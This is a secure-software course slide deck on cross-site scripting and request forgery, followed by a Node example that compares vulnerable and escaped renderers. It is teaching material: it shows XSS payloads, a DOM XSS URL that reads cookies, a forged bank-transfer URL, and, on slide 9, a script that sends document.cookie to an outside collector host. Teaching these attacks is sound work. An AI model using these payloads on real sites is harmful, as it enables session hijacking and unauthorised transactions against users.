

SLIDE 1

SWEN-331: Engineering Secure Software
Benjamin S Meyers

VOTD: XSS & CSRF

Engineering Secure Software

Last Revised: September 8, 2020

SLIDE 2

What is XSS?

  • XSS: Cross Site Scripting
  • Injecting malicious scripts into a web page, so that other users' browsers execute them with the privileges of the trusted site (its cookies, its DOM, its origin)
  • CWE-79

SLIDE 3

Types of XSS

  • Stored
    ○ The malicious script gets saved on the webserver, usually in a database, and is served to every user who views the affected page
  • Reflected
    ○ The malicious script is not saved on the webserver; the server echoes it straight back from the request (e.g. a query parameter or form field) into the response, so the victim has to be tricked into sending the crafted request (e.g. by clicking a link)
  • DOM: Document Object Model
    ○ The page's own client-side JavaScript reads attacker-controlled data (e.g. from the URL) and writes it into the DOM; the server-side code and the HTML it serves remain unchanged

SLIDE 4

Reflected XSS Example

  • <script>alert("You've been hacked!")</script>
    ○ Submit this in a form field or URL parameter that the page echoes back unencoded; the alert firing shows the browser executed script that the server placed in the page

SLIDE 5

Reflected XSS Example

  • <img src="http://www.page.com/img.jpg">
    ○ Injection is not limited to <script>: if the page echoes this markup unencoded, the browser fetches and renders an image the attacker chose; the same injection point accepts tags with event-handler attributes (e.g. onerror), which run script without any <script> tag

SLIDE 6

Stored XSS Example

  • Same as reflected, but the malicious script gets saved in the database and executed every time the field containing the script is displayed on the page
  • DVWA → XSS (Stored)
    ○ Enter <script>alert("You've been hacked!")</script> in the comments box and hit "Sign Guestbook"
    ○ The script now runs every time the guestbook page is rendered, for every visitor, not just for the user who submitted it

SLIDE 7

DOM XSS Example

  • Changing the DOM environment in a browser causes the client-side code (which is unchanged) to execute differently
    ○ Here the page's script reads the default parameter from the URL and writes it into the page, so whatever the parameter contains becomes markup
  • Normal URL:
    http://testing.com/book.html?default=1
  • Attacked URL:
    http://testing.com/book.html?default=<script>alert(document.cookie)</script>
    ○ The server never acts on the parameter; the page's own client-side script turns it into executable content. Put the payload after a # (URL fragment) and it is not even sent to the server, so server-side filtering cannot see it

SLIDE 8

Mitigations

  • Defense in Depth
    ○ Thorough input validation
    ○ Accept only known good inputs (e.g. whitelist)
    ○ Escape special characters at output time (e.g. < to &lt;), using the encoding for the context the data lands in (HTML body, attribute, JavaScript, URL)
  • Code reviews!
  • Automated testing
    ○ Fuzzers!
  • Input sanitization libraries
    ○ Ruby on Rails: sanitize gem
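The following is an added example, not code from the slides: it simulates the book.html?default=... page from slide 7 in Node (no browser needed) and applies the slide 8 mitigations to it. A DOM XSS needs a source (the page's script reading the URL) and a sink (that value written into the page as markup); the vulnerable renderer below does exactly that, the second renderer only escapes, and the hardened renderer accepts only known-good values and still escapes at the sink. The option list, the parameter name and the markup shape are assumptions for illustration.

```javascript
// Added example (not from the slides): a Node simulation of the
// book.html?default=... DOM XSS from slide 7 and the slide 8 mitigations.
// KNOWN_OPTIONS and the <select> markup are assumptions for illustration.

const KNOWN_OPTIONS = ["1", "2", "3"]; // assumed set of valid `default` values

// DOM XSS source: a client-side script reading the `default` parameter from
// the URL (location.href / location.search). Node's WHATWG URL class decodes
// the percent-encoding the same way the browser's URLSearchParams would.
function readDefaultParam(url) {
  return new URL(url).searchParams.get("default");
}

// VULNERABLE sink: the attacker-controlled string is concatenated into markup
// (mirrors document.write('<option value="' + def + '">' + def + '</option>')).
function renderVulnerable(url) {
  const def = readDefaultParam(url);
  return '<select><option value="' + def + '">' + def + '</option></select>';
}

// Escape the five characters that matter in HTML text and double-quoted
// attribute contexts ("< to &lt;" from slide 8, done completely).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Mitigation 1 only: escape at the sink. The payload is rendered as harmless
// text, but garbage still reaches the page.
function renderEscapedOnly(url) {
  const safe = escapeHtml(readDefaultParam(url));
  return '<select><option value="' + safe + '">' + safe + '</option></select>';
}

// Mitigation 1 + 2 (defense in depth): accept only known-good values, fall
// back to a default otherwise, and escape anyway in case the allowlist is
// ever loosened.
function renderHardened(url) {
  const def = readDefaultParam(url);
  const value = KNOWN_OPTIONS.includes(def) ? def : KNOWN_OPTIONS[0];
  const safe = escapeHtml(value);
  return '<select><option value="' + safe + '">' + safe + '</option></select>';
}

// Crude detector used to compare the renderers: is there a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The two URLs from slide 7.
const NORMAL_URL = "http://testing.com/book.html?default=1";
const ATTACK_URL =
  "http://testing.com/book.html?default=<script>alert(document.cookie)</script>";

console.log("source value  :", readDefaultParam(ATTACK_URL));
console.log("vulnerable    :", renderVulnerable(ATTACK_URL));
console.log("escaped only  :", renderEscapedOnly(ATTACK_URL));
console.log("hardened      :", renderHardened(ATTACK_URL));
console.log("hardened/normal:", renderHardened(NORMAL_URL));
```

Note that readDefaultParam only looks at the query string; a real page that reads location.hash instead has the same bug, and the payload then never appears in server logs. In a browser the fix is to stop building markup from the value at all (set textContent, or set the <select> by index from the allowlist) rather than to escape and keep concatenating.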

SLIDE 9

Notes

  • Commonly used for session hijacking
    ○ e.g. a script that sends document.cookie to an attacker-controlled server
  • Has been used against GMail, Twitter, Facebook, Yahoo, etc.
  • Good discussion of XSS and exploits
  • Not just <script> tags
    ○ e.g. CSS injection
    ○ e.g. Image metadata
    ○ e.g. File uploads (fake images that are actually PHP scripts)

Session-hijacking payload from the slide notes:

<script>
  // sends the victim's cookies to the attacker's collector in a GET request
  x = new XMLHttpRequest();
  x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true);
  x.send();
</script>

(Cookies flagged HttpOnly are not readable via document.cookie, which blunts this particular payload but not XSS in general: the injected script can still make requests as the user.)

SLIDE 10

What is CSRF?

  • CSRF: Cross Site Request Forgery
    ○ XSS exploits the trust that a client has for a website
    ○ CSRF exploits the trust that a site has for the user (really, for the user's browser and the cookies it attaches automatically)
  • Forging requests on behalf of an authenticated user: the victim's browser sends a request the victim never intended, with the victim's cookies attached; no script has to run on the target site
  • Usually: when an HTTP GET request makes a persistent modification, you can get users to make changes to other websites they are already authenticated to, just by getting their browser to load a URL
  • CWE-352

SLIDE 11

CSRF Examples

  • Malicious links in emails sent from a (spoofed) trusted address
  • Modifying arguments in a URL query string to cause malicious behavior
    ○ http://bank.com/transfer.do?acct=BEN&amount=100000
    ○ Anyone who loads this URL while logged in to bank.com (by clicking a link, or because an <img src="..."> pointing at it sits in a page or email they open) sends the transfer with their own session cookie

SLIDE 12

Mitigations

  • Don't allow GET actions to make persistent modifications
    ○ If you have to use GET, make it re-authenticate
    ○ POST alone is not enough: a hidden form on the attacker's page can auto-submit a POST; require a per-session anti-CSRF token in every state-changing form and reject requests that lack it
  • Don't allow session tokens in URL query strings, only cookies
    ○ Setting the session cookie SameSite=Lax or Strict stops the browser attaching it to most cross-site requests
  • Don't load images in emails from untrusted addresses
    ○ Loading an image sends a GET to whatever URL the sender chose, carrying your cookies for that site; that GET is the forged request
  • Don't open emails from untrusted addresses, period
